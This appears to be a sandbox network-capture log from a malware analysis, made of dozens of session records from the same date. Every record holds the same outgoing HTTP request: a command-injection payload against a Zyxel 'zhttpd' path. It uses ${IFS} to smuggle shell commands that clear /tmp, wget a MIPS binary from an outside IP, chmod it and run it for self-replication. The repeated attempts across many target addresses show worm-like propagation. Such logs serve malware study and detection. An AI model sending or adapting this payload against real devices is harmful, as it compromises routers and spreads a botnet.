                                                Jan 28, 2024 10:16:19.728991032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3026192.168.2.2336448122.228.220.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.728992939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3027192.168.2.2360636122.51.80.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729010105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3028192.168.2.235651846.77.178.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729037046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3029192.168.2.234430847.150.228.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729049921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3030192.168.2.2353264196.11.50.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729093075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3031192.168.2.2349094153.17.249.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729105949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3032192.168.2.2349410145.78.148.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729140997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3033192.168.2.2352404144.72.48.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729166031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3034192.168.2.235651858.189.232.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729182959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3035192.168.2.2348310178.162.184.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729209900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3036192.168.2.234597883.233.164.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729231119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3037192.168.2.2348012101.46.118.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729266882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3038192.168.2.234928040.113.146.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729316950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3039192.168.2.236096468.119.246.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729331970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3040192.168.2.2340528130.214.0.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729372978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3041192.168.2.2345364145.160.121.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729393005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3042192.168.2.2346462141.29.43.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729414940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3043192.168.2.233447673.144.39.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729425907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3044192.168.2.2338200109.201.251.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729474068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3045192.168.2.2335654171.146.245.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729482889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3046192.168.2.2352554211.173.245.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729496956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3047192.168.2.2339414172.243.227.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729526043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3048192.168.2.2345684177.241.9.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729547024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3049192.168.2.235798474.29.255.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729597092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3050192.168.2.2343096102.58.97.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729617119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3051192.168.2.2333748212.133.78.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729644060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3052192.168.2.2339838221.255.168.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729667902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3053192.168.2.2346418102.37.73.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729676962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3054192.168.2.2333612151.70.233.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729726076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3055192.168.2.2333582182.33.82.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729743958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3056192.168.2.2358460133.58.61.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729789019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3057192.168.2.2354984164.171.60.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729808092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3058192.168.2.235895614.122.166.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729836941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3059192.168.2.235298632.233.187.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729870081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3060192.168.2.234641870.71.53.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729912043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3061192.168.2.2349230170.202.178.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729935884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3062192.168.2.2339174141.65.167.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.729958057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3063192.168.2.233924642.249.157.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730001926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3064192.168.2.2341546190.230.109.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730010986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3065192.168.2.235896449.23.7.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730031967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3066192.168.2.2341238119.20.7.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730032921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3067192.168.2.2346368218.71.166.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730051994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3068192.168.2.233511840.212.236.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730073929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3069192.168.2.2351610199.73.251.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730094910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3070192.168.2.2337622116.87.119.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730115891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3071192.168.2.233408654.236.1.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730173111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3072192.168.2.2337034146.3.221.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730179071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3073192.168.2.2344036161.33.29.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730211973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3074192.168.2.235523885.149.247.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730237007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3075192.168.2.2343534144.198.80.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730278015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3076192.168.2.2343408191.89.0.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730295897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3077192.168.2.234790646.112.159.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730331898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3078192.168.2.234521220.67.32.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730345964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3079192.168.2.2347408210.172.32.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730387926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3080192.168.2.234097685.66.62.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730417013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3081192.168.2.2351060153.135.115.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730462074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3082192.168.2.234700463.66.160.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730477095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3083192.168.2.233925295.52.152.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730509043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3084192.168.2.2343810135.190.102.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730539083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3085192.168.2.2358478153.232.166.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730564117 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3086192.168.2.233755235.79.209.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.730596066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3087192.168.2.2346514112.216.240.212443
                                                TimestampBytes transferredDirectionData
